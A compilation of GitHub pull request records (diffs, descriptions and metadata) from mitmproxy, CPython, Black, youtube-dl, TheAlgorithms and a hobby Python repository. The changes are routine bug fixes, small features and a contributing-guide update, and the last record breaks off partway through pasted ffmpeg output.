_CommandBase, t: type, start: str) -> typing.Seque return ret def parse(self, manager: _CommandBase, t: type, s: str) -> str: - return s + return os.path.expanduser(s) def is_valid(self, manager: _CommandBase, typ: typing.Any, val: typing.Any) -> bool: return isinstance(val, str) diff --git a/test/mitmproxy/test_types.py b/test/mitmproxy/test_types.py index 72492fa9a8..aafddef19b 100644 --- a/test/mitmproxy/test_types.py +++ b/test/mitmproxy/test_types.py @@ -2,6 +2,7 @@ import os import typing import contextlib +from unittest import mock from mitmproxy.test import tutils import mitmproxy.exceptions @@ -69,7 +70,10 @@ def test_path(): b = mitmproxy.types._PathType() assert b.parse(tctx.master.commands, mitmproxy.types.Path, "/foo") == "/foo" assert b.parse(tctx.master.commands, mitmproxy.types.Path, "/bar") == "/bar" + with mock.patch.dict("os.environ", {"HOME": "/home/test"}): + assert b.parse(tctx.master.commands, mitmproxy.types.Path, "~/mitm") == "/home/test/mitm" assert b.is_valid(tctx.master.commands, mitmproxy.types.Path, "foo") is True + assert b.is_valid(tctx.master.commands, mitmproxy.types.Path, "~/mitm") is True assert b.is_valid(tctx.master.commands, mitmproxy.types.Path, 3) is False def normPathOpts(prefix, match):
While I am sorting out #3074, I decided to try to warm up :grinning: The list of all commands which work with a path: https://github.com/mitmproxy/mitmproxy/issues/3002#issuecomment-374228453
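A small standalone illustration of what the change relies on (the home directory shown is hypothetical): `os.path.expanduser` rewrites a leading `~` and leaves other strings untouched, which is also why `cut.save` strips the `+` append marker before expanding.

```python
import os.path

print(os.path.expanduser("~/mitm"))    # e.g. /home/test/mitm
print(os.path.expanduser("/foo"))      # /foo, unchanged
print(os.path.expanduser("+~/flows"))  # "+~/flows" -- unchanged, so the "+" must be stripped first
```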
https://api.github.com/repos/mitmproxy/mitmproxy/pulls/3078
2018-04-25T23:03:34Z
2018-04-26T09:02:11Z
2018-04-26T09:02:11Z
2018-06-01T17:52:14Z
883
mitmproxy/mitmproxy
27,414
bpo-32499: Add dataclasses.is_dataclass(obj), which returns True if obj is a dataclass or an instance of one.
diff --git a/Lib/dataclasses.py b/Lib/dataclasses.py index eaaed63ef2826e..b4786bf502e8c6 100644 --- a/Lib/dataclasses.py +++ b/Lib/dataclasses.py @@ -16,6 +16,7 @@ 'astuple', 'make_dataclass', 'replace', + 'is_dataclass', ] # Raised when an attempt is made to modify a frozen class. @@ -615,11 +616,17 @@ def fields(class_or_instance): return tuple(f for f in fields.values() if f._field_type is _FIELD) -def _isdataclass(obj): +def _is_dataclass_instance(obj): """Returns True if obj is an instance of a dataclass.""" return not isinstance(obj, type) and hasattr(obj, _MARKER) +def is_dataclass(obj): + """Returns True if obj is a dataclass or an instance of a + dataclass.""" + return hasattr(obj, _MARKER) + + def asdict(obj, *, dict_factory=dict): """Return the fields of a dataclass instance as a new dictionary mapping field names to field values. @@ -639,12 +646,12 @@ class C: dataclass instances. This will also look into built-in containers: tuples, lists, and dicts. """ - if not _isdataclass(obj): + if not _is_dataclass_instance(obj): raise TypeError("asdict() should be called on dataclass instances") return _asdict_inner(obj, dict_factory) def _asdict_inner(obj, dict_factory): - if _isdataclass(obj): + if _is_dataclass_instance(obj): result = [] for f in fields(obj): value = _asdict_inner(getattr(obj, f.name), dict_factory) @@ -678,12 +685,12 @@ class C: tuples, lists, and dicts. """ - if not _isdataclass(obj): + if not _is_dataclass_instance(obj): raise TypeError("astuple() should be called on dataclass instances") return _astuple_inner(obj, tuple_factory) def _astuple_inner(obj, tuple_factory): - if _isdataclass(obj): + if _is_dataclass_instance(obj): result = [] for f in fields(obj): value = _astuple_inner(getattr(obj, f.name), tuple_factory) @@ -751,7 +758,7 @@ class C: # We're going to mutate 'changes', but that's okay because it's a new # dict, even if called with 'replace(obj, **my_changes)'. - if not _isdataclass(obj): + if not _is_dataclass_instance(obj): raise TypeError("replace() should be called on dataclass instances") # It's an error to have init=False fields in 'changes'. diff --git a/Lib/test/test_dataclasses.py b/Lib/test/test_dataclasses.py index ed6956398827b4..fca384d8c3c06c 100755 --- a/Lib/test/test_dataclasses.py +++ b/Lib/test/test_dataclasses.py @@ -1,6 +1,6 @@ from dataclasses import ( dataclass, field, FrozenInstanceError, fields, asdict, astuple, - make_dataclass, replace, InitVar, Field, MISSING + make_dataclass, replace, InitVar, Field, MISSING, is_dataclass, ) import pickle @@ -1365,27 +1365,32 @@ class C: self.assertIs(C().x, int) - def test_isdataclass(self): - # There is no isdataclass() helper any more, but the PEP - # describes how to write it, so make sure that works. Note - # that this version returns True for both classes and - # instances. 
- def isdataclass(obj): - try: - fields(obj) - return True - except TypeError: - return False + def test_is_dataclass(self): + class NotDataClass: + pass - self.assertFalse(isdataclass(0)) - self.assertFalse(isdataclass(int)) + self.assertFalse(is_dataclass(0)) + self.assertFalse(is_dataclass(int)) + self.assertFalse(is_dataclass(NotDataClass)) + self.assertFalse(is_dataclass(NotDataClass())) @dataclass class C: x: int - self.assertTrue(isdataclass(C)) - self.assertTrue(isdataclass(C(0))) + @dataclass + class D: + d: C + e: int + + c = C(10) + d = D(c, 4) + + self.assertTrue(is_dataclass(C)) + self.assertTrue(is_dataclass(c)) + self.assertFalse(is_dataclass(c.x)) + self.assertTrue(is_dataclass(d.d)) + self.assertFalse(is_dataclass(d.e)) def test_helper_fields_with_class_instance(self): # Check that we can call fields() on either a class or instance, diff --git a/Misc/NEWS.d/next/Library/2018-01-06-10-54-16.bpo-32499.koyY-4.rst b/Misc/NEWS.d/next/Library/2018-01-06-10-54-16.bpo-32499.koyY-4.rst new file mode 100644 index 00000000000000..bf3e99c8d861cf --- /dev/null +++ b/Misc/NEWS.d/next/Library/2018-01-06-10-54-16.bpo-32499.koyY-4.rst @@ -0,0 +1,2 @@ +Add dataclasses.is_dataclass(obj), which returns True if obj is a dataclass +or an instance of one.
https://bugs.python.org/issue32499
https://api.github.com/repos/python/cpython/pulls/5113
2018-01-06T15:57:00Z
2018-01-06T17:41:53Z
2018-01-06T17:41:53Z
2018-01-06T17:41:57Z
1,304
python/cpython
3,798
Update get_youtube_view.py
diff --git a/get_youtube_view.py b/get_youtube_view.py index 4291af4e60..84fbf8ce7b 100644 --- a/get_youtube_view.py +++ b/get_youtube_view.py @@ -13,7 +13,7 @@ #adding ability to change number of repeats count = int(input("Number of times to be repeated: ")) #Same as before -x = input("Enter the URL (no https): ") +url = input("Enter the URL : ") print( "Length of video:") minutes = int(input("Minutes ")) seconds = int(input("Seconds ")) @@ -22,9 +22,13 @@ refreshrate = minutes * 60 + seconds #Selecting Safari as the browser driver = webdriver.Safari() -driver.get("http://"+x) -for i in range(count): +if(url.startswith("https://"): + driver.get(url) +else: + driver.get("https://"+url) + +for _ in range(count): #Sets the page to refresh at the refreshrate. time.sleep(refreshrate) driver.refresh()
Made the URL input less strict when pasting: the `https://` prefix is now optional.
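A standalone sketch of the prefix handling the patch aims for (hypothetical helper name, not the script's own code):

```python
# Accept URLs pasted with or without the scheme.
# Note: the submitted diff's `if(url.startswith("https://"):` line is missing a closing parenthesis.
def normalize(url: str) -> str:
    if url.startswith("https://"):
        return url
    return "https://" + url

print(normalize("youtube.com/watch?v=abc"))          # https://youtube.com/watch?v=abc
print(normalize("https://youtube.com/watch?v=abc"))  # unchanged
```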
https://api.github.com/repos/geekcomputers/Python/pulls/493
2019-04-12T07:17:58Z
2019-04-13T08:01:43Z
2019-04-13T08:01:43Z
2019-04-21T02:00:16Z
241
geekcomputers/Python
30,959
Update CONTRIBUTING.md
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 8c0f54ad528d..8cd03217d51f 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -23,26 +23,38 @@ We are very happy that you consider implementing algorithms and data structure f We appreciate any contribution, from fixing a grammar mistake in a comment to implementing complex algorithms. Please read this section if you are contributing your work. +Your contribution will be tested by our [automated testing on Travis CI](https://travis-ci.org/TheAlgorithms/Python/pull_requests) to save time and mental energy. After you have submitted your pull request, you should see the Travis tests start to run at the bottom of your submission page. If those tests fail, then click on the ___details___ button try to read through the Travis output to understand the failure. If you do not understand, please leave a comment on your submission page and a community member will try to help. + #### Coding Style We want your work to be readable by others; therefore, we encourage you to note the following: -- Please write in Python 3.x. -- Please consider running [__python/black__](https://github.com/python/black) on your Python file(s) before submitting your pull request. This is not a requirement but it does make your code more readable. There are other code formatters (autopep8, yapf) but the __black__ style is now the recommendation of the Python core team. To use it, +- Please write in Python 3.7+. __print()__ is a function in Python 3 so __print "Hello"__ will _not_ work but __print("Hello")__ will. + +- Please focus hard on naming of functions, classes, and variables. Help your reader by using __descriptive names__ that can help you to remove redundant comments. + - Single letter variable names are _old school_ so please avoid them unless their life only spans a few lines. + - Expand acronyms because __gcd()__ is hard to understand but __greatest_common_divisor()__ is not. + - Please follow the [Python Naming Conventions](https://pep8.org/#prescriptive-naming-conventions) so variable_names and function_names should be lower_case, CONSTANTS in UPPERCASE, ClassNames should be CamelCase, etc. + +- We encourage the use of Python [f-strings](https://realpython.com/python-f-strings/#f-strings-a-new-and-improved-way-to-format-strings-in-python) where the make the code easier to read. + +- Please consider running [__psf/black__](https://github.com/python/black) on your Python file(s) before submitting your pull request. This is not yet a requirement but it does make your code more readable and automatically aligns it with much of [PEP 8](https://www.python.org/dev/peps/pep-0008/). There are other code formatters (autopep8, yapf) but the __black__ style is now the recommendation of the Python Core Team. To use it, ```bash pip3 install black # only required the first time - black my-submission.py + black . ``` - All submissions will need to pass the test __flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics__ before they will be accepted so if possible, try this test locally on your Python file(s) before submitting your pull request. + ```bash + pip3 install flake8 # only required the first time + flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics + ``` -- If you know [PEP 8](https://www.python.org/dev/peps/pep-0008/) already, you will have no problem in coding style, though we do not follow it strictly. Read the remaining section and have fun coding! - -- Always use 4 spaces to indent. 
+- Original code submission require docstrings or comments to describe your work. -- Original code submission requires comments to describe your work. +- More on docstrings and comments: -- More on comments and docstrings: + If you are using a Wikipedia article or some other source material to create your algorithm, please add the URL in a docstring or comment to help your reader. The following are considered to be bad and may be requested to be improved: @@ -52,34 +64,40 @@ We want your work to be readable by others; therefore, we encourage you to note This is too trivial. Comments are expected to be explanatory. For comments, you can write them above, on or below a line of code, as long as you are consistent within the same piece of code. - *Sometimes, docstrings are avoided.* This will happen if you are using some editors and not careful with indentation: + We encourage you to put docstrings inside your functions but please pay attention to indentation of docstrings. The following is acceptable in this case: ```python + def sumab(a, b): + """ + This function returns the sum of two integers a and b + Return: a + b """ - This function sums a and b - """ - def sum(a, b): return a + b ``` - However, if you insist to use docstrings, we encourage you to put docstrings inside functions. Also, please pay attention to indentation to docstrings. The following is acceptable in this case: +- Write tests (especially [__doctests__](https://docs.python.org/3/library/doctest.html)) to illustrate and verify your work. We highly encourage the use of _doctests on all functions_. ```python def sumab(a, b): """ - This function sums two integers a and b - Return: a + b + This function returns the sum of two integers a and b + Return: a + b + >>> sum(2, 2) + 4 + >>> sum(-2, 3) + 1 + >>> sum(4.9, 6.1) + 10.0 """ return a + b ``` -- `lambda`, `map`, `filter`, `reduce` and complicated list comprehension are welcome and acceptable to demonstrate the power of Python, as long as they are simple enough to read. - - - This is arguable: **write comments** and assign appropriate variable names, so that the code is easy to read! - -- Write tests to illustrate your work. 
+ These doctests will be run by pytest as part of our automated testing so please try to run your doctests locally and make sure that they are found and pass: + ```bash + python3 -m doctest -v my_submission.py + ``` - The following "testing" approaches are **not** encouraged: + The use of the Python builtin __input()__ function is **not** encouraged: ```python input('Enter your input:') @@ -87,34 +105,31 @@ We want your work to be readable by others; therefore, we encourage you to note input = eval(input("Enter your input: ")) ``` - However, if your code uses __input()__ then we encourage you to gracefully deal with leading and trailing whitespace in user input by adding __.strip()__ to the end as in: + However, if your code uses __input()__ then we encourage you to gracefully deal with leading and trailing whitespace in user input by adding __.strip()__ as in: ```python starting_value = int(input("Please enter a starting value: ").strip()) ``` - - Please write down your test case, like the following: - - ```python - def sumab(a, b): - return a + b - # Write tests this way: - print(sumab(1, 2)) # 1+2 = 3 - print(sumab(6, 4)) # 6+4 = 10 - # Or this way: - print("1 + 2 = ", sumab(1, 2)) # 1+2 = 3 - print("6 + 4 = ", sumab(6, 4)) # 6+4 = 10 + + The use of [Python type hints](https://docs.python.org/3/library/typing.html) is encouraged for function parameters and return values. Our automated testing will run [mypy](http://mypy-lang.org) so run that locally before making your submission. +```python +def sumab(a: int, b: int) --> int: + pass ``` - Better yet, if you know how to write [__doctests__](https://docs.python.org/3/library/doctest.html), please consider adding them. +- [__list comprehensions and generators__](https://docs.python.org/3/tutorial/datastructures.html#list-comprehensions) are preferred over the use of `lambda`, `map`, `filter`, `reduce` but the important thing is to demonstrate the power of Python in code that is easy to read and maintain. - Avoid importing external libraries for basic algorithms. Only use those libraries for complicated algorithms. +- If you need a third party module that is not in the file __requirements.txt__, please add it to that file as part of your submission. + #### Other Standard While Submitting Your Work - File extension for code should be `.py`. Jupiter notebook files are acceptable in machine learning algorithms. -- Strictly use snake case (underscore separated) in your file name, as it will be easy to parse in future using scripts. +- Please avoid creating new directories if at all possible. Try to fit your work into the existing directory structue. + +- Strictly use snake_case (underscore_separated) in your file_name, as it will be easy to parse in future using scripts. If possible, follow the standard *within* the folder you are submitting to. @@ -135,5 +150,4 @@ We want your work to be readable by others; therefore, we encourage you to note - Happy coding! - Writer [@poyea](https://github.com/poyea), Jun 2019.
Many __Hacktoberfest__ contributors are not used to __automated testing__, so these updates to CONTRIBUTING.md should help them understand our standards and recommendations. @cozek Thanks for your review.
https://api.github.com/repos/TheAlgorithms/Python/pulls/1250
2019-10-02T09:01:25Z
2019-10-02T16:19:01Z
2019-10-02T16:19:01Z
2019-10-02T16:22:50Z
2,276
TheAlgorithms/Python
29,905
bpo-40334: use the TOKENS file when checking dangling rules
diff --git a/Tools/peg_generator/pegen/build.py b/Tools/peg_generator/pegen/build.py index 94248ffd9431c4..1eff7a12aa30f4 100644 --- a/Tools/peg_generator/pegen/build.py +++ b/Tools/peg_generator/pegen/build.py @@ -17,6 +17,8 @@ MOD_DIR = pathlib.Path(__file__).parent +TokenDefinitions = Tuple[Dict[int, str], Dict[str, int], Set[str]] + def get_extra_flags(compiler_flags: str, compiler_py_flags_nodist: str) -> List[str]: flags = sysconfig.get_config_var(compiler_flags) @@ -112,7 +114,8 @@ def build_parser( return grammar, parser, tokenizer -def generate_token_definitions(tokens: IO[str]) -> Tuple[Dict[str, int], Set[str]]: +def generate_token_definitions(tokens: IO[str]) -> TokenDefinitions: + all_tokens = {} exact_tokens = {} non_exact_tokens = set() numbers = itertools.count(0) @@ -129,13 +132,15 @@ def generate_token_definitions(tokens: IO[str]) -> Tuple[Dict[str, int], Set[str if len(pieces) == 1: (token,) = pieces non_exact_tokens.add(token) + all_tokens[index] = token elif len(pieces) == 2: - _, op = pieces + token, op = pieces exact_tokens[op.strip("'")] = index + all_tokens[index] = token else: raise ValueError(f"Unexpected line found in Tokens file: {line}") - return exact_tokens, non_exact_tokens + return all_tokens, exact_tokens, non_exact_tokens def build_c_generator( @@ -149,10 +154,10 @@ def build_c_generator( skip_actions: bool = False, ) -> ParserGenerator: with open(tokens_file, "r") as tok_file: - exact_tok, non_exact_tok = generate_token_definitions(tok_file) + all_tokens, exact_tok, non_exact_tok = generate_token_definitions(tok_file) with open(output_file, "w") as file: gen: ParserGenerator = CParserGenerator( - grammar, exact_tok, non_exact_tok, file, skip_actions=skip_actions + grammar, all_tokens, exact_tok, non_exact_tok, file, skip_actions=skip_actions ) gen.generate(grammar_file) diff --git a/Tools/peg_generator/pegen/c_generator.py b/Tools/peg_generator/pegen/c_generator.py index 6c77f43991bbe9..c9c67067d4677f 100644 --- a/Tools/peg_generator/pegen/c_generator.py +++ b/Tools/peg_generator/pegen/c_generator.py @@ -265,13 +265,14 @@ class CParserGenerator(ParserGenerator, GrammarVisitor): def __init__( self, grammar: grammar.Grammar, + tokens: Dict[int, str], exact_tokens: Dict[str, int], non_exact_tokens: Set[str], file: Optional[IO[Text]], debug: bool = False, skip_actions: bool = False, ): - super().__init__(grammar, file) + super().__init__(grammar, tokens, file) self.callmakervisitor: CCallMakerVisitor = CCallMakerVisitor( self, exact_tokens, non_exact_tokens ) diff --git a/Tools/peg_generator/pegen/parser_generator.py b/Tools/peg_generator/pegen/parser_generator.py index b92df2267762d1..03452510b9669b 100644 --- a/Tools/peg_generator/pegen/parser_generator.py +++ b/Tools/peg_generator/pegen/parser_generator.py @@ -1,5 +1,4 @@ import contextlib -import token from abc import abstractmethod from typing import AbstractSet, Dict, IO, Iterator, List, Optional, Set, Text, Tuple @@ -19,11 +18,12 @@ class RuleCheckingVisitor(GrammarVisitor): - def __init__(self, rules: Dict[str, Rule]): + def __init__(self, rules: Dict[str, Rule], tokens: Dict[int, str]): self.rules = rules + self.tokens = tokens def visit_NameLeaf(self, node: NameLeaf) -> None: - if node.value not in self.rules and node.value not in token.tok_name.values(): + if node.value not in self.rules and node.value not in self.tokens.values(): # TODO: Add line/col info to (leaf) nodes raise GrammarError(f"Dangling reference to rule {node.value!r}") @@ -32,12 +32,13 @@ class ParserGenerator: callmakervisitor: 
GrammarVisitor - def __init__(self, grammar: Grammar, file: Optional[IO[Text]]): + def __init__(self, grammar: Grammar, tokens: Dict[int, str], file: Optional[IO[Text]]): self.grammar = grammar + self.tokens = tokens self.rules = grammar.rules if "trailer" not in grammar.metas and "start" not in self.rules: raise GrammarError("Grammar without a trailer must have a 'start' rule") - checker = RuleCheckingVisitor(self.rules) + checker = RuleCheckingVisitor(self.rules, self.tokens) for rule in self.rules.values(): checker.visit(rule) self.file = file diff --git a/Tools/peg_generator/pegen/python_generator.py b/Tools/peg_generator/pegen/python_generator.py index bde27890c15a65..64336552f24f6c 100644 --- a/Tools/peg_generator/pegen/python_generator.py +++ b/Tools/peg_generator/pegen/python_generator.py @@ -1,3 +1,4 @@ +import token from typing import Any, Dict, Optional, IO, Text, Tuple from pegen.grammar import ( @@ -123,8 +124,13 @@ def visit_Cut(self, node: Cut) -> Tuple[str, str]: class PythonParserGenerator(ParserGenerator, GrammarVisitor): - def __init__(self, grammar: grammar.Grammar, file: Optional[IO[Text]]): - super().__init__(grammar, file) + def __init__( + self, + grammar: grammar.Grammar, + file: Optional[IO[Text]], + tokens: Dict[int, str] = token.tok_name, + ): + super().__init__(grammar, tokens, file) self.callmakervisitor = PythonCallMakerVisitor(self) def generate(self, filename: str) -> None: diff --git a/Tools/peg_generator/pegen/testutil.py b/Tools/peg_generator/pegen/testutil.py index 1f79d8f702fb1b..264659e71768c9 100644 --- a/Tools/peg_generator/pegen/testutil.py +++ b/Tools/peg_generator/pegen/testutil.py @@ -17,6 +17,7 @@ from pegen.python_generator import PythonParserGenerator from pegen.tokenizer import Tokenizer +ALL_TOKENS = token.tok_name EXACT_TOKENS = token.EXACT_TOKEN_TYPES # type: ignore NON_EXACT_TOKENS = { name for index, name in token.tok_name.items() if index not in EXACT_TOKENS.values() @@ -76,7 +77,7 @@ def import_file(full_name: str, path: str) -> Any: def generate_c_parser_source(grammar: Grammar) -> str: out = io.StringIO() - genr = CParserGenerator(grammar, EXACT_TOKENS, NON_EXACT_TOKENS, out) + genr = CParserGenerator(grammar, ALL_TOKENS, EXACT_TOKENS, NON_EXACT_TOKENS, out) genr.generate("<string>") return out.getvalue() @@ -96,7 +97,9 @@ def generate_parser_c_extension( assert not os.listdir(path) source = path / "parse.c" with open(source, "w") as file: - genr = CParserGenerator(grammar, EXACT_TOKENS, NON_EXACT_TOKENS, file, debug=debug) + genr = CParserGenerator( + grammar, ALL_TOKENS, EXACT_TOKENS, NON_EXACT_TOKENS, file, debug=debug + ) genr.generate("parse.c") compile_c_extension(str(source), build_dir=str(path))
<!-- issue-number: [bpo-40334](https://bugs.python.org/issue40334) --> https://bugs.python.org/issue40334 <!-- /issue-number -->
https://api.github.com/repos/python/cpython/pulls/19849
2020-05-01T21:26:44Z
2020-05-01T22:14:12Z
2020-05-01T22:14:12Z
2020-05-01T22:14:16Z
1,880
python/cpython
4,256
Do not add an extra blank line to an import line that has fmt disabled
diff --git a/CHANGES.md b/CHANGES.md index eff2640a01e..06a0ab7e9eb 100644 --- a/CHANGES.md +++ b/CHANGES.md @@ -10,6 +10,9 @@ <!-- Changes that affect Black's stable style --> +- Import lines with `# fmt: skip` and `# fmt: off` no longer have an extra blank line + added when they are right after another import line (#3610) + ### Preview style <!-- Changes that affect Black's preview style --> diff --git a/src/black/comments.py b/src/black/comments.py index 7cf15bf67b3..619123ab4be 100644 --- a/src/black/comments.py +++ b/src/black/comments.py @@ -203,6 +203,7 @@ def convert_one_fmt_off_pair(node: Node) -> bool: STANDALONE_COMMENT, hidden_value, prefix=standalone_comment_prefix, + fmt_pass_converted_first_leaf=first_leaf_of(first), ), ) return True diff --git a/src/black/lines.py b/src/black/lines.py index 329dfc4f0d3..66bba14b357 100644 --- a/src/black/lines.py +++ b/src/black/lines.py @@ -195,6 +195,26 @@ def opens_block(self) -> bool: return False return self.leaves[-1].type == token.COLON + def is_fmt_pass_converted( + self, *, first_leaf_matches: Optional[Callable[[Leaf], bool]] = None + ) -> bool: + """Is this line converted from fmt off/skip code? + + If first_leaf_matches is not None, it only returns True if the first + leaf of converted code matches. + """ + if len(self.leaves) != 1: + return False + leaf = self.leaves[0] + if ( + leaf.type != STANDALONE_COMMENT + or leaf.fmt_pass_converted_first_leaf is None + ): + return False + return first_leaf_matches is None or first_leaf_matches( + leaf.fmt_pass_converted_first_leaf + ) + def contains_standalone_comments(self, depth_limit: int = sys.maxsize) -> bool: """If so, needs to be split before emitting.""" for leaf in self.leaves: @@ -597,6 +617,7 @@ def _maybe_empty_lines(self, current_line: Line) -> Tuple[int, int]: self.previous_line and self.previous_line.is_import and not current_line.is_import + and not current_line.is_fmt_pass_converted(first_leaf_matches=is_import) and depth == self.previous_line.depth ): return (before or 1), 0 diff --git a/src/blib2to3/pytree.py b/src/blib2to3/pytree.py index 15a1420ef7d..ea60c894e20 100644 --- a/src/blib2to3/pytree.py +++ b/src/blib2to3/pytree.py @@ -392,6 +392,10 @@ class Leaf(Base): _prefix = "" # Whitespace and comments preceding this token in the input lineno: int = 0 # Line where this token starts in the input column: int = 0 # Column where this token starts in the input + # If not None, this Leaf is created by converting a block of fmt off/skip + # code, and `fmt_pass_converted_first_leaf` points to the first Leaf in the + # converted code. + fmt_pass_converted_first_leaf: Optional["Leaf"] = None def __init__( self, @@ -401,6 +405,7 @@ def __init__( prefix: Optional[Text] = None, fixers_applied: List[Any] = [], opening_bracket: Optional["Leaf"] = None, + fmt_pass_converted_first_leaf: Optional["Leaf"] = None, ) -> None: """ Initializer. 
@@ -419,6 +424,7 @@ def __init__( self.fixers_applied: Optional[List[Any]] = fixers_applied[:] self.children = [] self.opening_bracket = opening_bracket + self.fmt_pass_converted_first_leaf = fmt_pass_converted_first_leaf def __repr__(self) -> str: """Return a canonical string representation.""" diff --git a/tests/data/simple_cases/fmtonoff.py b/tests/data/simple_cases/fmtonoff.py index e40ea2c8d21..d1f15cd5c8b 100644 --- a/tests/data/simple_cases/fmtonoff.py +++ b/tests/data/simple_cases/fmtonoff.py @@ -195,7 +195,6 @@ def single_literal_yapf_disable(): from third_party import X, Y, Z from library import some_connection, some_decorator - # fmt: off from third_party import (X, Y, Z) diff --git a/tests/data/simple_cases/fmtpass_imports.py b/tests/data/simple_cases/fmtpass_imports.py new file mode 100644 index 00000000000..8b3c0bc662a --- /dev/null +++ b/tests/data/simple_cases/fmtpass_imports.py @@ -0,0 +1,19 @@ +# Regression test for https://github.com/psf/black/issues/3438 + +import ast +import collections # fmt: skip +import dataclasses +# fmt: off +import os +# fmt: on +import pathlib + +import re # fmt: skip +import secrets + +# fmt: off +import sys +# fmt: on + +import tempfile +import zoneinfo
<!-- Hello! Thanks for submitting a PR. To help make things go a bit more smoothly we would appreciate that you go through this template. --> ### Description Fixes #3438. This isn't put in preview style because: 1. Already formatted code always has the extra blank line, so it shouldn't change already formatted code and doesn't violate the stability policy. 2. This unblocks us from upstreaming the incremental formatting patches in *Pyink*, and we don't want to require `--preview` (in at least in 2023) to use this feature. It would also make integrations with IDEs / pre-commit harder if we require `--preview`. <!-- Good things to put here include: reasoning for the change (please link any relevant issues!), any noteworthy (or hacky) choices to be aware of, or what the problem resolved here looked like ... we won't mind a ranty story :) --> ### Checklist - did you ... <!-- If any of the following items aren't relevant for your contribution please still tick them so we know you've gone through the checklist. All user-facing changes should get an entry. Otherwise, signal to us this should get the magical label to silence the CHANGELOG entry check. Tests are required for bugfixes and new features. Documentation changes are necessary for formatting and most enhancement changes. --> - [x] Add an entry in `CHANGES.md` if necessary? - [x] Add / update tests if necessary? - [x] Add new / update outdated documentation? <!-- Just as a reminder, everyone in all psf/black spaces including PRs must follow the PSF Code of Conduct (link below). Finally, once again thanks for your time and effort. If you have any feedback in regards to your experience contributing here, please let us know! Helpful links: PSF COC: https://www.python.org/psf/conduct/ Contributing docs: https://black.readthedocs.io/en/latest/contributing/index.html Chat on Python Discord: https://discord.gg/RtVdv86PrH -->
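A hedged, runnable illustration of the behaviour this record fixes, mirroring the new `fmtpass_imports.py` test data in the diff above (the snippet itself is not part of the PR): before the change, Black treated the `# fmt: skip` import as a standalone comment rather than an import and inserted an extra blank line after the first import; after the change the two lines stay adjacent.

```python
# Minimal reproduction of the case from psf/black issue #3438 described above.
# Pre-fix, Black inserted a blank line between these two imports; post-fix (and
# for already-formatted code) they remain on consecutive lines.
import ast
import collections  # fmt: skip
```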
https://api.github.com/repos/psf/black/pulls/3610
2023-03-17T02:35:15Z
2023-03-18T04:39:22Z
2023-03-18T04:39:22Z
2023-03-19T04:14:15Z
1,288
psf/black
24,499
Fix hang when backgrounded
diff --git a/youtube_dl/utils.py b/youtube_dl/utils.py index 28941673fa9..a89ff6908b3 100644 --- a/youtube_dl/utils.py +++ b/youtube_dl/utils.py @@ -1820,6 +1820,7 @@ def get_exe_version(exe, args=['--version'], try: out, _ = subprocess.Popen( [encodeArgument(exe)] + args, + stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).communicate() except OSError: return False
- [x] Bug fix --- ### Description of your _pull request_ and other information youtube-dl hangs when backgrounded because ffmpeg -version tries to read from stdin: ``` pb3:youtube-dl jhawk$ python -m youtube_dl -v 'BaW_jenozKc' & [1] 4263 pb3:youtube-dl jhawk$ [debug] System config: [] [debug] User config: [] [debug] Command-line args: [u'-v', u'BaW_jenozKc'] [debug] Encodings: locale UTF-8, fs utf-8, out UTF-8, pref UTF-8 [debug] youtube-dl version 2016.10.21.1 [debug] Git HEAD: 69c2d42 [debug] Python version 2.7.10 - Darwin-14.5.0-x86_64-i386-64bit [1]+ Stopped python -m youtube_dl -v 'BaW_jenozKc' pb3:youtube-dl jhawk$ jobs -l [1]+ 4263 Stopped (tty output): 22python -m youtube_dl -v 'BaW_jenozKc' pb3:youtube-dl jhawk$ pstree 4263 -+= 04263 jhawk python -m youtube_dl -v BaW_jenozKc \--- 04271 jhawk ffmpeg -version pb3:youtube-dl jhawk$ pb3:youtube-dl jhawk$ ffmpeg -version & [2] 4276 pb3:youtube-dl jhawk$ [2]+ Stopped ffmpeg -version pb3:youtube-dl jhawk$ fg %2 ffmpeg -version ffmpeg version 3.1.4 Copyright (c) 2000-2016 the FFmpeg developers built with Apple LLVM version 7.0.2 (clang-700.1.81) configuration: --prefix=/usr/local/Cellar/ffmpeg/3.1.4 --enable-shared --enable-pthreads --enable-gpl --enable-version3 --enable-hardcoded-tables --enable-avresample --cc=clang --host-cflags= --host-ldflags= --enable-opencl --enable-libx264 --enable-libmp3lame --enable-libxvid --enable-openssl --disable-lzma --enable-nonfree --enable-vda libavutil 55. 28.100 / 55. 28.100 libavcodec 57. 48.101 / 57. 48.101 libavformat 57. 41.100 / 57. 41.100 libavdevice 57. 0.101 / 57. 0.101 libavfilter 6. 47.100 / 6. 47.100 libavresample 3. 0. 0 / 3. 0. 0 libswscale 4. 1.100 / 4. 1.100 libswresample 2. 1.100 / 2. 1.100 libpostproc 54. 0.100 / 54. 0.100 pb3:youtube-dl jhawk$ pb3:youtube-dl jhawk$ ffmpeg -version <&- & [2] 4277 pb3:youtube-dl jhawk$ ffmpeg version 3.1.4 Copyright (c) 2000-2016 the FFmpeg developers built with Apple LLVM version 7.0.2 (clang-700.1.81) configuration: --prefix=/usr/local/Cellar/ffmpeg/3.1.4 --enable-shared --enable-pthreads --enable-gpl --enable-version3 --enable-hardcoded-tables --enable-avresample --cc=clang --host-cflags= --host-ldflags= --enable-opencl --enable-libx264 --enable-libmp3lame --enable-libxvid --enable-openssl --disable-lzma --enable-nonfree --enable-vda libavutil 55. 28.100 / 55. 28.100 libavcodec 57. 48.101 / 57. 48.101 libavformat 57. 41.100 / 57. 41.100 libavdevice 57. 0.101 / 57. 0.101 libavfilter 6. 47.100 / 6. 47.100 libavresample 3. 0. 0 / 3. 0. 0 libswscale 4. 1.100 / 4. 1.100 libswresample 2. 1.100 / 2. 1.100 libpostproc 54. 0.100 / 54. 0.100 [2]- Done ffmpeg -version 0>&- pb3:youtube-dl jhawk$ ffmpeg -version </dev/null & [2] 4278 pb3:youtube-dl jhawk$ ffmpeg version 3.1.4 Copyright (c) 2000-2016 the FFmpeg developers built with Apple LLVM version 7.0.2 (clang-700.1.81) configuration: --prefix=/usr/local/Cellar/ffmpeg/3.1.4 --enable-shared --enable-pthreads --enable-gpl --enable-version3 --enable-hardcoded-tables --enable-avresample --cc=clang --host-cflags= --host-ldflags= --enable-opencl --enable-libx264 --enable-libmp3lame --enable-libxvid --enable-openssl --disable-lzma --enable-nonfree --enable-vda libavutil 55. 28.100 / 55. 28.100 libavcodec 57. 48.101 / 57. 48.101 